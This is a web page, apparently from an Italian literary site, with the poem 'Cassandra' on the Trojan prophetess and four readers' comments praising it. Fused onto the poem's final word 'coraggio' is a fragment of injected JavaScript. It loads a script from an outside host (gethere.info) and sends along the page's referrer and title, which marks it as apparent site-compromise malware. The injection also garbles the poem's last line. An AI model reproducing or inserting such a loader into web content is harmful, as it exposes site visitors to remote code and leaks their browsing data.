Cassandra

Lo so.
Prima di ogni tempo
l’ho visto
accadere.
Persino la mia morte
portano impressi
questi occhi miei
colmi di futuro
e di sciagura.
Non ho paura.
Troia in fiamme
sorprende voi;
non impressiona me.

Lo sapevo.
Prima di ogni tempo
l’avevo visto
accadere.
Anche la mia lingua
muta
l’aveva previsto
alle vostre orecchie
sorde alle mie grida.

Mi attende, ora
l’ultima tappa
di questo estremo viaggio:
priva di ogni sostegno
varcherò l’Ade
rivestita solo
di sangue
e coraggio.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

  • Valeria Bellobono

    Già alla serata “Voci di Donna” ho espresso il mio giudizio sulla tua poesia. Cassandra è uno dei personaggi mitologici che perferisco, e la tua opera la incarna perfettamente nella sua rassegnata disperazione. Il coraggio scritto nel cuore dei vincitori che conoscono il sapore dell’inevitabile sconfitta brucia come l’immagine evocativa e terribile di Troia in fiamme. Struggente.

  • Alessandra Carnovale

    Una delle letture che più ho apprezzato in vita mia è stato “Cassandra” di Christa Wolf. Evidentemente è una figura che mi è rimasta impressa.
    Grazie

  • Mi associo a Valeria. Questa é una delle mie preferite, per ritmo dei versi ed impatto, tra le tue poesie che ho avuto modo di leggere o ascoltare.

  • Cassandra… una figura così incredibilmente potente e tragica…
    Bella la poesia, per me al primo incontro.
    Bella la chiave di lettura di Christa Wolf, anche se nel mio cuore c’è la sua Medea…